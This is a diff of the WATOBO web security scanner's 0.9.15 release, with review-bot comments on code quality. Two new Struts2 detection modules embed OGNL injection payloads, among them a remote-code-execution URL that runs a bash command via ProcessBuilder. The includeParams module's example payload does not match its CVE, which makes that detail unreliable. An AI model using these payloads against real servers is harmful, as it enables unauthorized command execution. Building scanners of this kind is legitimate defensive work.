watobo 0.9.14 → 0.9.15

Files changed (47)
  1. data/CHANGELOG.md +29 -0
  2. data/config/interceptor.yml +1 -0
  3. data/lib/watobo/core/active_check.rb +1 -2
  4. data/lib/watobo/core/client_cert_store.rb +47 -0
  5. data/lib/watobo/core/scanner3.rb +124 -88
  6. data/lib/watobo/core/session.rb +52 -47
  7. data/lib/watobo/core.rb +1 -11
  8. data/lib/watobo/gui/chatviewer_frame.rb +5 -3
  9. data/lib/watobo/gui/checkboxtree.rb +59 -14
  10. data/lib/watobo/gui/checks_policy_frame.rb +1 -5
  11. data/lib/watobo/gui/client_cert_dialog.rb +260 -96
  12. data/lib/watobo/gui/conversation_table.rb +7 -1
  13. data/lib/watobo/gui/conversation_table_ctrl2.rb +14 -5
  14. data/lib/watobo/gui/edit_comment.rb +1 -1
  15. data/lib/watobo/gui/main_window.rb +40 -5
  16. data/lib/watobo/gui/manual_request_editor.rb +10 -8
  17. data/lib/watobo/gui/quick_scan_dialog.rb +8 -6
  18. data/lib/watobo/gui/scanner_settings_dialog.rb +1 -0
  19. data/lib/watobo/gui/text_viewer.rb +5 -3
  20. data/lib/watobo/http/cookies/cookies.rb +3 -1
  21. data/lib/watobo/http_socket/agent.rb +1 -1
  22. data/lib/watobo/http_socket/client_socket.rb +409 -98
  23. data/lib/watobo/http_socket/connection.rb +1 -1
  24. data/lib/watobo/http_socket/http_socket.rb +47 -39
  25. data/lib/watobo/interceptor/proxy.rb +41 -212
  26. data/lib/watobo/mixins/httpparser.rb +17 -16
  27. data/lib/watobo/mixins/shapers.rb +3 -7
  28. data/lib/watobo.rb +2 -1
  29. data/modules/active/domino/domino_db.rb +5 -7
  30. data/modules/active/struts2/default_handler_ognl.rb +128 -0
  31. data/modules/active/struts2/include_params_ognl.rb +127 -0
  32. data/modules/passive/ajax.rb +5 -3
  33. data/modules/passive/detect_infrastructure.rb +2 -3
  34. data/modules/passive/dirindexing.rb +8 -6
  35. data/modules/passive/disclosure_emails.rb +13 -14
  36. data/modules/passive/disclosure_ipaddr.rb +13 -13
  37. data/modules/passive/hotspots.rb +6 -4
  38. data/modules/passive/in_script_parameter.rb +25 -19
  39. data/modules/passive/redirectionz.rb +1 -1
  40. data/modules/passive/sap-headers.rb +78 -0
  41. data/modules/passive/xss_dom.rb +5 -3
  42. data/plugins/catalog/catalog.rb +7 -2
  43. data/plugins/crawler/gui/auth_frame.rb +20 -5
  44. data/plugins/crawler/gui/crawler_gui.rb +56 -9
  45. data/plugins/crawler/lib/engine.rb +12 -14
  46. data/plugins/filefinder/dbs/sap.db +157 -0
  47. metadata +23 -2
@@ -27,13 +27,11 @@ module Watobo#:nodoc: all
27
27
  include Watobo::Constants
28
28
  def replace_post_parm(parm,value)
29
29
  parm_quoted = Regexp.quote(parm)
30
- self.last.gsub!(/([?&]{0,1})#{parm_quoted}=([0-9a-zA-Z\-\._,+<>\%!=]*)(&{0,1})/i, "\\1#{parm}=#{value}\\3")
30
+ self.last.gsub!(/([?&]{0,1})#{parm_quoted}=([^&]*)(&{0,1})/i, "\\1#{parm}=#{value}\\3")
31
31
  end
32
32
 
33
33
  def replace_get_parm(parm,value)
34
34
  parm_quoted = Regexp.quote(parm)
35
- # puts "replacing parameter #{parm} with value #{value}"
36
- # self.first.gsub!(/([?&]{0,1})#{parm}=([0-9a-zA-Z\-\._,+<>\%!=]*)(&{0,1})/i, "\\1#{parm}=#{value}\\3")
37
35
  self.first.gsub!(/([?&]{1})#{parm_quoted}=([^ &]*)(&{0,1})/i, "\\1#{parm}=#{value}\\3")
38
36
  end
39
37
 
@@ -42,7 +40,6 @@ module Watobo#:nodoc: all
42
40
  end
43
41
 
44
42
  def replaceFileExt(new_file)
45
- # puts "replace element #{new_element}"
46
43
  begin
47
44
  file = new_file.strip
48
45
  file.gsub!(/^\//, "")
@@ -53,9 +50,8 @@ module Watobo#:nodoc: all
53
50
  end
54
51
 
55
52
  def replaceElement(new_element)
56
- # puts "replace element #{new_element}"
57
53
  new_element.gsub!(/^\//, "")
58
- self.first.gsub!(/(.*\/)(.*) (HTTP.*)/i,"\\1#{new_element} \\3")
54
+ self.first.gsub!(/([^\?]*\/)(.*) (HTTP.*)/i,"\\1#{new_element} \\3")
59
55
  end
60
56
 
61
57
  def replaceURL(new_url)
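Review bot: The new line `self.first.gsub!(/([^\?]*\/)(.*) (HTTP.*)/i,"\\1#{new_element} \\3")` interpolates the caller-supplied `new_element` into gsub's replacement template, so any backslash sequence in it (`\1`, `\&`, `\\`) is interpreted by gsub instead of being written literally; the new lines of the hunk at 27 (`replace_post_parm`, `replace_get_parm`) do the same with `value`. Since these methods exist to place arbitrary test strings into the request, use the block form, which inserts the string verbatim: `self.first.gsub!(/([^\?]*\/)(.*) (HTTP.*)/i) { "#{$1}#{new_element} #{$3}" }`. The `[^\?]*` change itself looks right: group 1 can no longer run past a `?`, so a `/` inside the query string is not mistaken for the path separator.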
@@ -370,7 +366,7 @@ module Watobo#:nodoc: all
370
366
  begin
371
367
  new_header = "#{header}: #{value}\r\n"
372
368
  self.each_with_index do |h, i|
373
- if h =~ /^#{Regexp.quote(header)}:/
369
+ if h =~ /^#{Regexp.quote(header)}:/i
374
370
  h.replace(new_header)
375
371
  return true
376
372
  end
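--- a/data/lib/watobo.rb
+++ b/data/lib/watobo.rb
@@ -23,6 +23,7 @@
 #Encoding: UTF-8
 require 'rubygems'
 require 'yaml'
+require 'json'
 require 'thread'
 require 'socket'
 require 'timeout'
@@ -63,7 +64,7 @@ dont_know_why_REQUIRE_hangs = Mechanize.new
 # @private
 module Watobo#:nodoc: all #:nodoc: all
 
-VERSION = "0.9.14"
+VERSION = "0.9.15"
 
 def self.base_directory
 @base_directory ||= ""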
@@ -35,7 +35,7 @@ module Watobo#:nodoc: all
35
35
  :description => "Enumeration of well known Domino DBs.", # description of checkfunction
36
36
  :author => "Andreas Schmidt", # author of check
37
37
  :check_group => AC_GROUP_DOMINO,
38
- :version => "0.9" # check version
38
+ :version => "1.0" # check version
39
39
  )
40
40
 
41
41
  @finding.update(
@@ -69,16 +69,14 @@ module Watobo#:nodoc: all
69
69
 
70
70
  def generateChecks(chat)
71
71
  begin
72
- if chat.request.url.to_s =~ /(.*)\/\w*\.nsf/ then
72
+ # if chat.request.url.to_s =~ /(.*)\/\w*\.nsf/ then
73
73
  @domino_dbs.each do |db|
74
74
  checker = proc{
75
75
  test_request = nil
76
76
  test_response = nil
77
77
  test = chat.copyRequest
78
- line = test.shift
79
- line.gsub!(/(\w*\.nsf.*) (HTTP\/.*)/, "#{db} \\2")
80
- # puts line
81
- test.unshift line
78
+
79
+ test.replaceFileExt db
82
80
 
83
81
  test_request,test_response = doRequest(test,:default => true)
84
82
 
@@ -110,7 +108,7 @@ module Watobo#:nodoc: all
110
108
  }
111
109
  yield checker
112
110
  end
113
- end
111
+ #end
114
112
  rescue => bang
115
113
  puts bang
116
114
  puts "ERROR!! #{Module.nesting[0].name}"
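Review bot: The `.nsf` URL guard is commented out (`# if chat.request.url.to_s =~ ...` in the hunk at 69) and its closing `end` becomes `#end` here, so the check now issues one request per entry of `@domino_dbs` for every chat instead of only for Domino-looking URLs. If that widening is intended, delete both commented lines rather than leaving dead code and say so in the `:description`, since the cost of the check changed along with the bump to version 1.0; if not, restore the guard. Replacing the hand-rolled request-line edit with `test.replaceFileExt db` is cleaner, but `replaceFileExt` is defined outside this hunk, so confirm it produces the same request line for a `db` value that contains a directory component.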
@@ -0,0 +1,128 @@
1
+ # .
2
+ # default_handler_ognl.rb
3
+ #
4
+ # Copyright 2013 by siberas, http://www.siberas.de
5
+ #
6
+ # This file is part of WATOBO (Web Application Tool Box)
7
+ # http://watobo.sourceforge.com
8
+ #
9
+ # WATOBO is free software; you can redistribute it and/or modify
10
+ # it under the terms of the GNU General Public License as published by
11
+ # the Free Software Foundation version 2 of the License.
12
+ #
13
+ # WATOBO is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with WATOBO; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ # .
22
+ # @private
23
+ module Watobo#:nodoc: all
24
+ module Modules
25
+ module Active
26
+ module Struts2
27
+
28
+
29
+ class Default_handler_ognl < Watobo::ActiveCheck
30
+ @@tested_directories = Hash.new
31
+
32
+ threat =<<'EOF'
33
+ A vulnerability introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command execution
34
+
35
+ Source: http://struts.apache.org/release/2.3.x/docs/s2-016.html
36
+ CVE: CVE-2013-2251
37
+ EOF
38
+
39
+ #
40
+ details =<<'EOD'
41
+ Example for code execution:
42
+ http://your.vulnerable.app/?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{%27/bin/bash%27,%27-c%27,%27touch%20/tmp/pwned%27})).start()}
43
+ EOD
44
+
45
+
46
+ measure = "Update Struts2 to version >2.3.15.1"
47
+
48
+ @info.update(
49
+ :check_name => 'Struts2 default handlers', # name of check which briefly describes functionality, will be used for tree and progress views
50
+ :check_group => "Struts",
51
+ :description => "Check for struts2 default handlers which doesn't sanitize parameters.", # description of checkfunction
52
+ :author => "Andreas Schmidt", # author of check
53
+ :version => "1.0" # check version
54
+ )
55
+
56
+ @finding.update(
57
+ :threat => threat, # thread of vulnerability, e.g. loss of information
58
+ :class => "Struts2 - default handlers", # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
59
+ :type => FINDING_TYPE_VULN, # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
60
+ :rating => VULN_RATING_CRITICAL,
61
+ :measure => measure,
62
+ :details => details
63
+ )
64
+
65
+ def initialize(project, prefs={})
66
+ super(project, prefs)
67
+
68
+ @vuln_handlers = %w( action redirect redirectAction)
69
+
70
+ def reset
71
+ @@tested_directories.clear
72
+ end
73
+
74
+
75
+ end
76
+
77
+
78
+ def generateChecks(chat)
79
+ begin
80
+ #
81
+ path = chat.request.dir
82
+ return true if @@tested_directories.has_key?(path)
83
+
84
+ @@tested_directories[path] = true
85
+ @vuln_handlers.each do |handler|
86
+ checker = proc {
87
+ results = {}
88
+ request = nil
89
+ response = nil
90
+ test_request = chat.copyRequest
91
+
92
+ test_value = '?' + CGI::escape("#{handler}:watobo_%{10000-1}")
93
+
94
+ test_request.replaceElement test_value
95
+
96
+ request, response = doRequest(test_request)
97
+
98
+ if response.headers.select{|h| h =~ /^Location:.*(_9999)/}.length > 0
99
+
100
+ addFinding( request, response,
101
+ :check_pattern => test_value,
102
+ :proof_pattern => "Location:.*_9999",
103
+ :test_item => handler,
104
+ :chat => chat,
105
+ :title => "[#{request.dir}] - #{handler}"
106
+ )
107
+ end
108
+
109
+ [ request, response ]
110
+ }
111
+ yield checker
112
+
113
+ end
114
+
115
+ rescue => bang
116
+ puts bang
117
+ puts bang.backtrace if $DEBUG
118
+ puts "ERROR!! #{Module.nesting[0].name}"
119
+ raise
120
+ end
121
+ end
122
+
123
+ end
124
+
125
+ end
126
+ end
127
+ end
128
+ end
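Review bot: `def reset` is nested inside `initialize` (the lines after `@vuln_handlers = ...`), so the method is (re)defined as a side effect of every instantiation and does not exist until the first instance is created; move it to class level next to `generateChecks` and close `initialize` right after the `@vuln_handlers` assignment. `@@tested_directories` is a class variable, hence shared with any subclass and cleared for all of them by `reset`; a class-level instance variable with a reader scopes it to this check. `results = {}` inside the proc is never used and can go, and `CGI::escape` needs `cgi` to be loaded, which is not visible in this file — presumably the framework does it; worth confirming.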
@@ -0,0 +1,127 @@
1
+ # .
2
+ # include_params_ognl.rb
3
+ #
4
+ # Copyright 2013 by siberas, http://www.siberas.de
5
+ #
6
+ # This file is part of WATOBO (Web Application Tool Box)
7
+ # http://watobo.sourceforge.com
8
+ #
9
+ # WATOBO is free software; you can redistribute it and/or modify
10
+ # it under the terms of the GNU General Public License as published by
11
+ # the Free Software Foundation version 2 of the License.
12
+ #
13
+ # WATOBO is distributed in the hope that it will be useful,
14
+ # but WITHOUT ANY WARRANTY; without even the implied warranty of
15
+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16
+ # GNU General Public License for more details.
17
+ #
18
+ # You should have received a copy of the GNU General Public License
19
+ # along with WATOBO; if not, write to the Free Software
20
+ # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
21
+ # .
22
+ # @private
23
+ module Watobo#:nodoc: all
24
+ module Modules
25
+ module Active
26
+ module Struts2
27
+
28
+
29
+ class Include_params_ognl < Watobo::ActiveCheck
30
+
31
+ threat =<<'EOF'
32
+ A vulnerability, present in the includeParams attribute of the URL and Anchor Tag, allows remote command execution
33
+
34
+ Source: http://struts.apache.org/release/2.3.x/docs/s2-013.html
35
+ CVE: CVE-2013-1966
36
+ EOF
37
+
38
+ #
39
+ details =<<'EOD'
40
+ Example for code execution:
41
+ http://your.vulnerable.app/?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{%27/bin/bash%27,%27-c%27,%27touch%20/tmp/pwned%27})).start()}
42
+ EOD
43
+
44
+
45
+ measure = "Update Struts2 to version >2.3.14"
46
+
47
+ @info.update(
48
+ :check_name => 'Struts2 includeParams', # name of check which briefly describes functionality, will be used for tree and progress views
49
+ :check_group => "Struts",
50
+ :description => "Check for vulnerable includeParams attribute.", # description of checkfunction
51
+ :author => "Andreas Schmidt", # author of check
52
+ :version => "1.0" # check version
53
+ )
54
+
55
+ @finding.update(
56
+ :threat => threat, # thread of vulnerability, e.g. loss of information
57
+ :class => "Struts2 - includeParams", # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
58
+ :type => FINDING_TYPE_VULN, # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
59
+ :rating => VULN_RATING_CRITICAL,
60
+ :measure => measure,
61
+ :details => details
62
+ )
63
+
64
+ def initialize(project, prefs={})
65
+ super(project, prefs)
66
+
67
+ end
68
+
69
+
70
+ def generateChecks(chat)
71
+ begin
72
+
73
+ checker = proc {
74
+ results = {}
75
+ request = nil
76
+ response = nil
77
+ test_request = chat.copyRequest
78
+
79
+
80
+ test_value = "%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#writer=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#writer.println(INJ),#writer.close())}"
81
+ marks = [ "INJ" , Time.now.to_i.to_s ]
82
+
83
+ inj_str = marks.map{|m| "'#{m}'"}.join("+")
84
+
85
+ test_value.gsub!(/INJ/, inj_str)
86
+
87
+ tparam = Watobo::UrlParameter.new( :name => "watobo", :value => CGI::escape(test_value) )
88
+
89
+ test_request.url.set tparam
90
+ puts test_request.first
91
+
92
+ request, response = doRequest(test_request)
93
+
94
+ if response.respond_to? :body
95
+ unless response.body.nil?
96
+ body = response.body.unpack("C*").pack("C*")
97
+ #puts body
98
+ proof = marks.join
99
+ if response.body.to_s =~ /#{proof}/
100
+ addFinding( request, response,
101
+ :check_pattern => CGI::escape(test_value),
102
+ :proof_pattern => "#{proof}",
103
+ :chat => chat,
104
+ :title => "[includeParams] - #{request.file}"
105
+ )
106
+ end
107
+ end
108
+ end
109
+
110
+ [ request, response ]
111
+ }
112
+ yield checker
113
+
114
+ rescue => bang
115
+ puts bang
116
+ puts bang.backtrace if $DEBUG
117
+ puts "ERROR!! #{Module.nesting[0].name}"
118
+ raise
119
+ end
120
+ end
121
+
122
+ end
123
+
124
+ end
125
+ end
126
+ end
127
+ end
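Review bot: `body = response.body.unpack("C*").pack("C*")` is computed but never used; the match two lines below runs against `response.body.to_s`, so the re-encoding that the other modules in this commit rely on has no effect here, and `proof` is interpolated into the regex unescaped: `if body =~ /#{Regexp.quote(proof)}/`. `puts test_request.first` writes every generated request line to stdout and looks like leftover debugging; drop it or gate it on `$DEBUG` as the backtrace print in the rescue already is. `results = {}` is unused as well.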
@@ -51,18 +51,20 @@ module Watobo#:nodoc: all
51
51
  end
52
52
 
53
53
  def showError(chatid, message)
54
- puts "!!! Error"
54
+ puts "!!! Error #{Module.nesting[0].name}"
55
55
  puts "Chat: [#{chatid}]"
56
56
  puts message
57
57
  end
58
58
 
59
59
  def do_test(chat)
60
60
  begin
61
-
61
+ return false if chat.response.nil?
62
+ return false unless chat.response.has_body?
62
63
  return true unless chat.response.content_type =~ /(text|script)/
63
64
 
64
65
  @fw_patterns.each do |pattern|
65
- if chat.response.body =~ /#{pattern[:pattern]}/i then
66
+ body = chat.response.body.unpack("C*").pack("C*")
67
+ if body =~ /#{pattern[:pattern]}/i then
66
68
  version = $1.strip
67
69
  addFinding(
68
70
  :check_pattern => "#{pattern[:pattern]}",
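Review bot: `version = $1.strip` on the context line after the new `if body =~ /#{pattern[:pattern]}/i` raises NoMethodError when the matching entry of `@fw_patterns` has no capture group, because `$1` is then nil; presumably every pattern has one, but `version = $1.to_s.strip` makes the check robust to an entry without it. The two new guards return `false` while the existing content-type guard just below returns `true`; whether the caller reads do_test's result is not visible here, but the mixed values read as if they carried meaning — pick one. The enclosing `begin`/`rescue` continues outside the hunk.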
@@ -70,10 +70,9 @@ module Watobo#:nodoc: all
70
70
  # puts "body" + chat.response.body.join
71
71
  return if chat.response.nil? or chat.response.body.nil?
72
72
  if chat.response.content_type =~ /text/ then
73
-
73
+ body = chat.response.body.unpack("C*").pack("C*")
74
74
  @pattern_list.each do |pat|
75
-
76
- if chat.response.join =~ /(#{pat[1]})/i then
75
+ if body =~ /(#{pat[1]})/i then
77
76
  # puts "!!! MATCH !!!"
78
77
  match = $1
79
78
  addFinding(
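Review bot: The new `if body =~ /(#{pat[1]})/i` matches only the response body, whereas the removed line matched `chat.response.join`, i.e. headers and body together; any entry of `@pattern_list` that was meant to hit a response header no longer fires. If restricting to the body is intended (the new variable name suggests so), it deserves a line in the CHANGELOG; otherwise keep `chat.response.join` or scan the headers separately. The guard two lines above still uses `body.nil?` with `or`, while the sibling modules in this commit use `return false unless chat.response.has_body?`; `||` also avoids the precedence surprise of `or` should that line ever be extended.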
@@ -61,12 +61,14 @@ module Watobo#:nodoc: all
61
61
  def do_test(chat)
62
62
  begin
63
63
  @pattern_list.each do |pat|
64
- if chat.response.body =~ /(#{pat})/i then
65
- match = $1
66
- addFinding(
67
- :proof_pattern => "#{match}",
68
- :chat => chat,
69
- :title => "/#{chat.request.path}"
64
+ next unless chat.response.has_body?
65
+ body = chat.response.body.unpack("C*").pack("C*")
66
+ if body =~ /(#{pat})/i then
67
+ match = $1
68
+ addFinding(
69
+ :proof_pattern => "#{match}",
70
+ :chat => chat,
71
+ :title => "/#{chat.request.path}"
70
72
  )
71
73
  end
72
74
  end
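Review bot: `next unless chat.response.has_body?` and the `unpack("C*").pack("C*")` re-encoding sit inside `@pattern_list.each`, so the body is re-checked and re-copied once per pattern although it cannot change between iterations. Hoist both above the loop, together with the nil guard the other modules in this commit added: `return false if chat.response.nil?`, `return false unless chat.response.has_body?`, `body = chat.response.body.unpack("C*").pack("C*")`, then iterate. The rest of do_test and its rescue continue outside the hunk.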
@@ -45,29 +45,28 @@ module Watobo#:nodoc: all
45
45
  )
46
46
 
47
47
  valid = '[a-zA-Z\d\.+-]+'
48
- @pattern = "#{valid}@#{valid}\\.(#{valid}){2}"
48
+ @pattern = "(#{valid}@#{valid}\\.(#{valid}){2})"
49
49
  @mail_list = []
50
50
  end
51
51
 
52
52
  def do_test(chat)
53
53
  begin
54
54
  # puts "running module: #{Module.nesting[0].name}"
55
+ return false if chat.response.nil?
56
+ return false unless chat.response.has_body?
55
57
  if chat.response.content_type =~ /text/ and not chat.response.content_type =~ /text.csv/ then
56
- if chat.response.each do |line|
57
- if line =~ /(#{@pattern})/ then
58
- match = $1
59
- if not @mail_list.include?(match) then
58
+ body = chat.response.body.unpack("C*").pack("C*")
59
+ body.scan(/#{@pattern}/) { |m|
60
+ match = m.first
61
+ unless @mail_list.include?(match) then
60
62
  @mail_list.push match
61
63
  addFinding(
62
- :proof_pattern => "#{match}",
63
- :chat => chat,
64
- :title => match
65
- )
66
- end
67
- end
68
-
69
- end
70
- end
64
+ :proof_pattern => "#{match}",
65
+ :chat => chat,
66
+ :title => match
67
+ )
68
+ end
69
+ }
71
70
  end
72
71
  rescue => bang
73
72
  # raise
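Review bot: `body.scan(/#{@pattern}/)` builds the Regexp from a string on every response; since the pattern is fixed in the constructor (visible at the top of the hunk), store it as a Regexp there, `@pattern = /(#{valid}@#{valid}\.(#{valid}){2})/`, and call `body.scan(@pattern)`. With two groups `scan` yields an Array per match, so `m.first` is the whole address as intended; a short comment such as `# scan yields [address, last_repetition] per hit` would save the next reader that check. The `and not` in the content-type test predates this change but reads more safely as `&& !`.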
@@ -45,22 +45,25 @@ module Watobo#:nodoc: all
45
45
  )
46
46
 
47
47
  @pattern = '[^\d\.](\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[^(\d\.)]+?'
48
+
48
49
  @known_ips = []
49
50
  end
50
51
 
51
52
  def do_test(chat)
52
53
  begin
53
54
  # puts "running module: #{Module.nesting[0].name}"
55
+ return false if chat.response.nil?
56
+ return false unless chat.response.has_body?
54
57
  if chat.response.content_type =~ /text/ then
55
- if chat.response.each do |line|
56
- if line =~ /#{@pattern}/ then
57
- ip_addr = $1
58
- octets = ip_addr.split('.')
59
- isIP = true
60
- octets.each do |o|
58
+ body = chat.response.body.unpack("C*").pack("C*")
59
+ body.scan(/#{@pattern}/) { |match|
60
+ ip_addr = match.first
61
+ octets = ip_addr.split('.')
62
+ isIP = true
63
+ octets.each do |o|
61
64
  isIP = false if o.to_i > 255
62
- end
63
- if isIP then
65
+ end
66
+ if isIP then
64
67
  title = "IP: #{ip_addr}"
65
68
  dummy = chat.request.site + ":" + ip_addr
66
69
  if not @known_ips.include?(dummy)
@@ -69,11 +72,8 @@ module Watobo#:nodoc: all
69
72
  :title => title)
70
73
  @known_ips.push dummy
71
74
  end
72
- end
73
- end
74
-
75
- end
76
- end
75
+ end
76
+ }
77
77
  end
78
78
  rescue => bang
79
79
  # raise
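Review bot: The octet test inside the new `body.scan` block (`isIP = true`, then `octets.each do |o| isIP = false if o.to_i > 255 end`) is a manual fold; `isIP = octets.all? { |o| o.to_i <= 255 }` says the same in one line and drops the mutable flag. `match.first` is correct here because `@pattern` has exactly one capture group, so `scan` yields a one-element Array per hit — worth a comment, since the same construct in the e-mail module yields two elements. The `@known_ips` dedup and the `rescue` continue outside the hunk.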
@@ -54,9 +54,12 @@ module Watobo#:nodoc: all
54
54
  def do_test(chat)
55
55
  begin
56
56
  # puts "running module: #{Module.nesting[0].name}"
57
+ return false if chat.response.nil?
58
+ return false unless chat.response.has_body?
57
59
  if chat.response.content_type =~ /(text|script)/ and chat.response.status !~ /404/ then
58
- if chat.response.each do |chunk|
59
- chunk.split(/\n/).each do |line|
60
+
61
+ body = chat.response.body.unpack("C*").pack("C*")
62
+ body.split(/\n/).each do |line|
60
63
  @pattern_list.each do |ext|
61
64
  if line =~ /([\w%\/\\\.:-]*\.#{ext})[^\w]/ then
62
65
  match = $1
@@ -71,8 +74,6 @@ module Watobo#:nodoc: all
71
74
  @known_functions.push match
72
75
  end
73
76
  end
74
- end
75
- end
76
77
  end
77
78
  end
78
79
  end
@@ -80,6 +81,7 @@ module Watobo#:nodoc: all
80
81
  # raise
81
82
  puts "ERROR!! #{Module.nesting[0].name}"
82
83
  puts bang
84
+ puts bang.backtrace
83
85
  end
84
86
  end
85
87
  end
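Review bot: `puts bang.backtrace` in the rescue is unconditional, so every failure of this check dumps a backtrace to the console; the new struts2 modules in this commit gate the same print on `$DEBUG` (`puts bang.backtrace if $DEBUG`), which keeps scan output readable. On the context line `if line =~ /([\w%\/\\\.:-]*\.#{ext})[^\w]/`, `ext` is interpolated unescaped, so an entry of `@pattern_list` containing a regex metacharacter would change the pattern's meaning; `Regexp.quote(ext)` is safer — hedged, as the list is defined outside the hunk. The re-encoded `body.split(/\n/)` replaces the removed per-chunk iteration cleanly.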
@@ -48,42 +48,48 @@ module Watobo#:nodoc: all
48
48
  end
49
49
 
50
50
  def showError(chatid, message)
51
- puts "!!! Error"
51
+ puts "!!! Error #{Module.nesting[0].name}"
52
52
  puts "Chat: [#{chatid}]"
53
53
  puts message
54
54
  end
55
55
 
56
56
  def do_test(chat)
57
57
  begin
58
- parm_values = []
59
58
  minlen = 3
60
- return true unless chat.response.content_type =~ /(text|script)/
61
- chat.request.get_parm_names.each do |parm|
62
- pv = Regexp.quote(chat.request.get_parm_value(parm))
63
- parm_values.push pv unless pv.strip.empty? or pv.strip.length < minlen
64
- end
65
- chat.request.post_parm_names.each do |parm|
66
- pv = chat.request.post_parm_value(parm)
67
- parm_values.push pv unless pv.strip.empty? or pv.strip.length < minlen
68
- end
59
+ return true unless chat.response.content_type =~ /(text|script)/
60
+ return true unless chat.response.has_body?
61
+
62
+ parm_list = chat.request.parameters(:data, :url)
63
+ return true if parm_list.empty?
64
+ body = chat.response.body.unpack("C*").pack("C*")
69
65
 
70
- parm_values.each do |parm_value|
71
-
72
- pattern = Regexp.quote(CGI.unescape(parm_value))
73
- if chat.response.body =~ /<script[^<\/]*#{pattern}/i then
66
+ doc = Nokogiri::HTML(body)
67
+ scripts = doc.css('script')
68
+
69
+ parm_list.each do |parm|
70
+ next if parm.value.nil?
71
+ next if parm.value.empty?
72
+ next if parm.value.length <= minlen
73
+
74
+ pattern = Regexp.quote(CGI.unescape(parm.value))
75
+ scripts.each do |script|
76
+ if script.text =~ /#{pattern}/i then
74
77
  # puts "* Found: Parameter within script"
75
78
  addFinding(
76
- :check_pattern => "#{parm_value}",
77
- :proof_pattern => "#{parm_value}",
78
- :chat=>chat,
79
- :title =>"[#{parm_value}] - #{chat.request.path}"
79
+ :check_pattern => "#{parm.value}",
80
+ :proof_pattern => "#{parm.value}",
81
+ :chat=>chat,
82
+ :title =>"[#{parm.value}] - #{chat.request.path}"
80
83
  )
84
+ end
81
85
 
82
86
  end
83
87
  end
84
88
  rescue => bang
85
89
  # raise
86
90
  showError(chat.id, bang)
91
+ #puts bang.backtrace
92
+
87
93
  end
88
94
  end
89
95
 
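Review bot: `next if parm.value.length <= minlen` skips values of exactly `minlen` characters, while the removed code kept them (`pv.strip.length < minlen`) and also ignored surrounding whitespace; unless the tighter bound is deliberate, `next if parm.value.strip.length < minlen` restores the old behaviour and makes the preceding `empty?` check redundant. `Nokogiri::HTML(body)` brings a third-party parser into this check and no `require` is visible in the hunk, so presumably it is loaded at file or framework level — confirm. The removed regex `<script[^<\/]*#{pattern}` stopped at the first `/` or `<` after `<script`, whereas `script.text` covers the whole element body, which is a wider and more useful scope; that change in detection deserves a line in the CHANGELOG.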
@@ -45,7 +45,7 @@ module Watobo#:nodoc: all
45
45
  end
46
46
 
47
47
  def showError(chatid, message)
48
- puts "!!! Error"
48
+ puts "!!! Error #{Module.nesting[0].name}"
49
49
  puts "Chat: [#{chatid}]"
50
50
  puts message
51
51
  end